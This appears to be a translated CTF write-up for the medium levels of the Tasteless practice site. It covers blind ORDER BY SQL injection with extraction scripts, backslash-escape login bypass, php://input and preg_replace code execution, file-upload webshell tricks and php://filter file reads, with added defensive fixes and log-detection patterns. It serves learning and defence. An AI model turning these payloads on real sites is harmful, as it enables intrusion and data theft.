Tasteless challenges medium WP
http://chall.tasteless.eu/
A practice site from abroad. It seems decent; I worked through it and wrote a WP along the way.
I haven't finished the hard section. I'm clearly too weak for it and didn't find it easy; I'll update later.
Also, I really couldn't figure out what easy Level 19 - Sort it out! is asking; if any senior knows, please tell me.
medium
Level 1 - Infiltration
http://chall.tasteless.eu/level1/index.php?dir=ASC
Looking at the URL, you can guess that the back-end SQL statement is
select * from id order by xx ASC;
The part after ORDER BY is the controllable point. Using a regexp together with the ^ (XOR) operator and watching how the page output differs, the flag length comes out as 32, so it is probably an md5 string.
http://chall.tasteless.eu/level1/index.php?dir=^(select length( (select flag from level1_flag) ) regexp '^30$')
http://chall.tasteless.eu/level1/index.php?dir=^(select length( (select flag from level1_flag) ) regexp '^31$')
http://chall.tasteless.eu/level1/index.php?dir=^(select length( (select flag from level1_flag) ) regexp '^32$')
Then write a script to guess it character by character:
```python
import requests

chars = '0123456789qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM'

def isTrue(p):
    url = "http://chall.tasteless.eu/level1/index.php?dir=^(select (select flag from level1_flag) regexp '^{}')".format(p)
    print(url)
    res = requests.get(url)
    # the row order in the page differs depending on whether the regexp matched
    if 'date of birth. </p><p>3 : Many facts of' in res.text:
        return True
    else:
        return False

length = 32
p = ''
for i in range(length):
    for c in chars:
        tp = p + c
        if isTrue(tp):
            p = tp
            break
print(p)
```
Reference: 玩得一手好註入之order by排序篇 (a Chinese article on ORDER BY injection)
Level 3 - Double Agent
```php
<?php
highlight_file('index.php');
/*
view file: php.ini
so here is my hint: the included php.ini file is part of the configuration file used on the server the bug was found.
so there will be something in it which enables you to solve this level, wont?

always be UP TO DATE!

hint enough, might just take you seconds to do?!
*/
error_reporting(0);
include('anti_rfi.php'); //rfi is forbidden!!!!!

$inc = @$_GET['file'];
@require_once($inc);
?>
```
Using php://input you can execute arbitrary code directly.
Level 6 - Too Easy
This one is similar to the first, but slightly more troublesome: this level filters some characters, such as if, updatexml, extractvalue, *, and so on, and the page displays 1 to 3 rows picked at random.
After testing several times I found that division can be used. For example, if the rows picked at random are id 1 and id 2, the default order is 1 then 2; if both are divided by -1, the displayed order is reversed, and this difference can be used to guess the data.
select xx regexp xx returns 0 or 1; 0-1=-1 and 1-1=0 (dividing by 0 doesn't seem to be a problem here; the result is NULL).
The same method shows the length is 32 (only for 32 is the output ascending; for everything else it is descending).
http://chall.tasteless.eu/level6/index.php?in=/( ( select length( (select flag from level6_flag) ) regexp '^30$') -1 )
http://chall.tasteless.eu/level6/index.php?in=/( ( select length( (select flag from level6_flag) ) regexp '^31$') -1 )
http://chall.tasteless.eu/level6/index.php?in=/( ( select length( (select flag from level6_flag) ) regexp '^32$') -1 )
Then write a script to guess it automatically. Comparing one character at a time is slow; the algorithm could be changed, e.g. to binary search.
```python
import requests
import re

chars = '0123456789qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM'

def isTrue(p):
    url = "http://chall.tasteless.eu/level6/index.php?in=/( ( select (select flag from level6_flag) regexp '^{}') -1 )".format(p)
    print(url)

    res = requests.get(url)
    # the page shows 1 to 3 random rows; retry until at least two are shown
    r = re.findall(r'(\d) :', res.text)
    count = len(r)
    while count < 2:
        res = requests.get(url)
        r = re.findall(r'(\d) :', res.text)
        count = len(r)
    # descending order means the regexp did not match (division by -1)
    if int(r[0]) > int(r[1]):
        return False
    else:
        return True

length = 32
p = ''
for i in range(length):
    for c in chars:
        tp = p + c
        if isTrue(tp):
            p = tp
            break
print(p)
```
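From the defender's side, both Level 1 and Level 6 come down to a sort parameter spliced into ORDER BY and a guessing loop that sends dozens of requests per character. The block below is an added example (not from the page or the challenge site) that shows the allow-list fix for the `dir` parameter and a small detector run over constructed access-log lines; the allow-list values and log format are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Values the sort parameter may legitimately take (assumption: the page only
# ever shows dir=ASC being used by the application itself).
ALLOWED_DIR = {"ASC", "DESC"}
SQL_TOKENS = re.compile(r"\b(select|regexp|from|length)\b", re.IGNORECASE)
LINE = re.compile(r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed access-log lines in a cut-down combined format: two normal
# requests and three shaped like the page's Level 1 / Level 6 probes.
SAMPLE_LOG = """\
10.0.0.5 "GET /level1/index.php?dir=ASC HTTP/1.1" 200
10.0.0.9 "GET /level1/index.php?dir=%5E(select+length(+(select+flag+from+level1_flag)+)+regexp+%27%5E32$%27) HTTP/1.1" 200
10.0.0.9 "GET /level1/index.php?dir=%5E(select+(select+flag+from+level1_flag)+regexp+%27%5Ea%27) HTTP/1.1" 200
10.0.0.5 "GET /level1/index.php?dir=DESC HTTP/1.1" 200
10.0.0.9 "GET /level6/index.php?in=/(+(select+length(+(select+flag+from+level6_flag)+)+regexp+%27%5E32$%27)+-1+) HTTP/1.1" 200
"""

def safe_direction(value):
    # Server-side fix: map the parameter onto a fixed keyword instead of
    # splicing the raw value into ORDER BY.
    return value.upper() if value.upper() in ALLOWED_DIR else "ASC"

def is_suspicious(url):
    # Flags a sort parameter outside its allow-list, or any parameter value
    # carrying SQL keywords or the ^( / /( prefixes seen in the probes above.
    for key, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for v in values:
            if key == "dir" and v.upper() not in ALLOWED_DIR:
                return True
            if SQL_TOKENS.search(v) or v.startswith(("^(", "/(")):
                return True
    return False

def suspicious_by_client(log_text):
    # Number of flagged requests per client; a long run from one address is
    # the signature of the character-by-character guessing loop.
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and is_suspicious(m["url"]):
            hits[m["ip"]] += 1
    return hits
```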
Level 7 - Get Me Down
After downloading the source I found that .htaccess is configured to parse jpeg files as PHP, and index.php checks the file's MIME type and so on. So take a normal jpeg image, append PHP code at the end and upload it; it will be executed.
Open the uploaded image and view the page source to get the flag.
Level 9 - In My Dreams
```php
<html>
<head>
<title>In My Dreams</title>
</head>
<body>
<p>Here is the <a href='index2.html'>source</a>!</p>
</body>
</html>
<?php
//hi all! you may ask what to do here? its simple, just have a nice walk through these lines, then just call w_()
//and its done
$_k = @$_GET['magic']; //put the magic byte here :)
$_u=create_function('$_a_','foreach($_a_ as $_=>$__){$a[$_]=$__;}return @array_splice($a,1);');
$_u=@call_user_func($_u,@$_GET['argv']);function w_(){print'Good job! flag: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';}$_f=chr(112).chr(114).__CLASS__."\x65"."\x67"."_";
$_function=create_function('$___,$_,$__','return(strcmp((($_^$__)|$___),123)==0)?1:0;');
((int)$_function((int)$_u[0],(int)$_u[1],(int)$_u[2])>0)?0:printf("%s",die());
$__=cosh;$___=$__[asinh(_)];$_t="\x31";$___.=$__[$_t+$_t+$_t];$___.=$__[$_t];$___++;$___++;$___++;
$_f.=substr(str_repeat("\x72",11),-3,1)."e";$_f_=metaphone(crc32(__DIR__).preg_replace("%^=(\?):*?[\sa-z*]*{\$}*?.[^\D]{1,}(\w|\s)$%sUi","${2}1,$1",crc32(__FILE__)));
@$_a.=__METHOD__."\x25".$___(@0+"@${$_t}"+~$_k+1*(5*20))."\x0";$_f.="pl";
$_f.="ac"."\x65";@$_f("%.".$_a."%ixs","(string)$_u[3]()",' ');
```
This code looks genuinely disgusting, but in the end I managed to untangle it. For the messy calculations in between, var_dump each variable right before it is used to see what it holds, then substitute that value; after substituting everything once, the code should be understandable.
The goal is to execute the function w_(), and the method is code execution via preg_replace, which you can look up on Baidu. But there is something special here: I never managed to construct the magic parameter by hand, so I ran it through Burp and eventually found that the character 0xCE happens to trigger it. So the final payload is
http://level9.tasteless.eu/index.php?magic=%ce&argv[0]=123&argv[1]=123&argv[2]=123&argv[3]=&argv[4]=w_
Level 10 - Never Trust The Obvious
A login form with no hints. The only thing that comes to mind is injection, usually SQL injection, but entering single and double quotes produced no error, so the back end probably escapes quotes.
Suppose the back-end SQL statement is
SELECT * FROM users WHERE username='$user' and password='$pass'
If you enter a single quote it gets escaped; i.e. with username ' and password x the statement becomes
SELECT * FROM users WHERE username='\'' and password='x'
Then I tested the escape character itself and got an error.
So it can be concluded that the back end really handles input this way, and that \ is not in the list of characters that get escaped; the statement should now be
SELECT * FROM users WHERE username='\' and password='x'
The quotes are unbalanced, so of course it errors.
Then the payload can be constructed: username \ and password or 1#
SELECT * FROM users WHERE username='\' and password='or 1#'
Logged in successfully.
Level 11 - Sjukdom
There is a local file inclusion; include that file directly and the flag is in it.
http://level11.tasteless.eu/index.php?file=php://filter/read=convert.base64-encode/resource=config.easy.inc.php
For the hard difficulty I haven't thought of a bypass yet; to be updated...
Also, if any expert has solved it, please let me know.
Level 15 - Tournament
From the program's functionality and the hint this is almost certainly SQL injection, but entering single and double quotes did not produce an error, so quotes must be escaped; so I tried the escape character.
Although there was no error, the displayed message is obviously wrong. As for why it shows the same message as the previous entry, I don't know the back-end logic either, but it is certain that something went wrong here. So I guess the statement that inserts into the database is roughly as follows (the code doesn't match exactly, because testing showed the injection point is only in name; message seems to be handled more strictly).
```php
<?php
$name=str_replace("'","\'",$_GET['name']);
$message=str_replace("'","\'",$_GET['message']);
$name=str_replace('"','\"',$name);
$message=str_replace('"','\"',$message);
$sql="INSERT INTO table_name (name,message) VALUES ('".$name."','".$message."')";
echo $sql;
```
The code only escapes single and double quotes but not the escape character itself, so if name is constructed as
title\',1111111)#
the final statement is
INSERT INTO table_name (name,message) VALUES ('title\\',111111)#','x')
Final payload:
title\',(select flag from level15_flag))#
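Levels 10 and 15 share the same root cause: quotes are escaped but the backslash is not, so a user-supplied backslash neutralises the escaping of the quote that follows. The block below is an added example (not from the page or the challenge) that models the reconstructed back end in Python: the page's escaping beside an escaping that handles the backslash first, a small literal parser that shows where the statement breaks, and a parameterized query as the real fix. The table names and the sqlite3 sample account are assumptions.

```python
import sqlite3

def naive_escape(value):
    # What the page reconstructs for Levels 10 and 15: quotes get a backslash,
    # but a backslash supplied by the user is passed through untouched.
    return value.replace("'", "\\'").replace('"', '\\"')

def proper_escape(value):
    # Escape the escape character first, then the quotes (the order
    # mysql_real_escape_string uses for these characters).
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def parse_literals(sql):
    # Minimal reader for single-quoted MySQL literals with backslash escapes;
    # returns (literal contents, text outside literals, ended inside a literal).
    literals, outside, cur, inside, i = [], [], "", False, 0
    while i < len(sql):
        ch = sql[i]
        if inside and ch == "\\" and i + 1 < len(sql):
            cur += sql[i + 1]          # escaped character, taken literally
            i += 2
            continue
        if inside and ch == "'":
            literals.append(cur)
            cur, inside = "", False
        elif inside:
            cur += ch
        elif ch == "'":
            inside = True
        else:
            outside.append(ch)
        i += 1
    return literals, "".join(outside), inside

LOGIN = "SELECT * FROM users WHERE username='%s' and password='%s'"
INSERT = "INSERT INTO table_name (name,message) VALUES ('%s','%s')"

def render(template, values, escape):
    # String splicing exactly as the reconstructed back end does it.
    return template % tuple(escape(v) for v in values)

def parameterized_login(user, password):
    # The real fix: bound parameters, shown with the stdlib sqlite3 driver
    # (constructed in-memory table with one sample account).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'secret')")
    row = db.execute("SELECT 1 FROM users WHERE username=? AND password=?",
                     (user, password)).fetchone()
    return row is not None
```

With the page's inputs, `naive_escape` leaves the `#` outside any literal (the rest of the statement becomes a comment), while `proper_escape` keeps both values inside their literals.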
Level 18 - Extensions?
```php
<html>
<head>
<title>Extensions?</title>
</head>
<body>
<p>source code: <a href="./index.php~">index.php~</a></p>
<br/>
<form action="index.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
<br />
<?php
error_reporting(0);

$output = array ();
$errors = array ();
$savePath = "upload";

if (isset ( $_FILES ['file'] ) && $_FILES ["file"] ["error"] == UPLOAD_ERR_OK) {

    $fileName = $_FILES ['file'] ['name'];
    $fileSize = $_FILES ['file'] ['size'];
    $fileTemp = $_FILES ['file'] ['tmp_name'];
    $fileType = $_FILES["file"]["type"] ;
    $fileExt = pathinfo ( $fileName, PATHINFO_EXTENSION );
    $fileExt = strtolower ( $fileExt );

    if (preg_match("/php$/i", $fileExt)) {
        $errors [] = "Invalid File Extention";
    }
    if ($fileSize > 800*1024) {
        $errors [] = "File Too large";
    }
    if (! is_writable ( $savePath )) {
        $errors [] = "File Destination not writeable";
    }

    $fileDst = $savePath . DIRECTORY_SEPARATOR . $fileName;
    $filePrifix = basename ( $fileName, "." . $fileExt );

    if(file_exists($fileDst)) {
        $errors [] = "Filename exists";
    }

    if (count ( $errors ) == 0) {
        if (@move_uploaded_file ( $fileTemp, $fileDst )) {
            $output['Destination'] = $fileDst;
        } else {
            $errors [] = "Error Saving File";
        }
    }

    if(count($errors) > 0)
    {
        echo "<h2>Upload Error</h2>" ;
        foreach ($errors as $error){
            echo $error , "<br/>" ;
        }
    }else{
        echo "<h2>File Uploaded</h2>" ;
        foreach ($output as $key => $value){
            echo $key . ": <a href=\"./$value\">" .$value , "</a><br/>" ;
        }
    }
}
?>
</body>
</html>
```
The regex in the code blocks files whose extension is php, so uploading a file with a php suffix won't work directly. However, Apache configurations contain regular expressions like
.+.ph(p[345]?|t|tml)
and any filename matching them is parsed as PHP, which means php3, php4, php5, pht and phtml can all be parsed.
So upload a PHP file with the extension php3 and it will be parsed. You can upload a one-liner shell, or simply the following:
```php
<?php
var_dump(scandir(".."));
echo file_get_contents("../D4tFl4g.php");
?>
```
View the page source to get the flag.
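The Level 18 filter fails because it is a deny-list ("ends in php") checked against a handler that accepts several spellings. The block below is an added example (not from the page or the challenge) that models the original check and an allow-list replacement in Python and lists which constructed filenames slip through each; the anchored handler pattern and the image allow-list are assumptions.

```python
import re

# The handler pattern quoted on the page, with the dot escaped and anchored at
# the end (assumption: that is how it would sit inside an Apache FilesMatch).
PHP_HANDLER = re.compile(r"\.ph(p[345]?|t|tml)$", re.IGNORECASE)

# Extensions the upload form is actually meant to accept (assumed allow-list).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Constructed upload names: one legitimate image, one plain text file and the
# spellings the page says the server would execute.
SAMPLE_UPLOADS = ["photo.jpg", "shell.php", "shell.php3", "shell.phtml",
                  "shell.pht", "shell.PhP5", "notes.txt"]

def extension(filename):
    # Mirrors pathinfo($fileName, PATHINFO_EXTENSION) followed by strtolower().
    base = filename.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""

def original_check_rejects(filename):
    # The Level 18 filter: a deny-list that only catches an extension ending in php.
    return re.search(r"php$", extension(filename), re.IGNORECASE) is not None

def hardened_check_rejects(filename):
    # Allow-list on the extension, refuse anything the handler would execute,
    # and refuse a second extension in the stem (a.php.jpg) as well. Storing
    # the file under a server-generated name would remove the last concern.
    ext = extension(filename)
    if ext not in ALLOWED_EXT:
        return True
    stem = filename[:-len(ext) - 1]
    return PHP_HANDLER.search(filename) is not None or "." in stem

def would_execute(filename):
    return PHP_HANDLER.search(filename) is not None

def filter_gaps(check):
    # Sample files the given filter lets through although the server would run them.
    return [f for f in SAMPLE_UPLOADS if not check(f) and would_execute(f)]
```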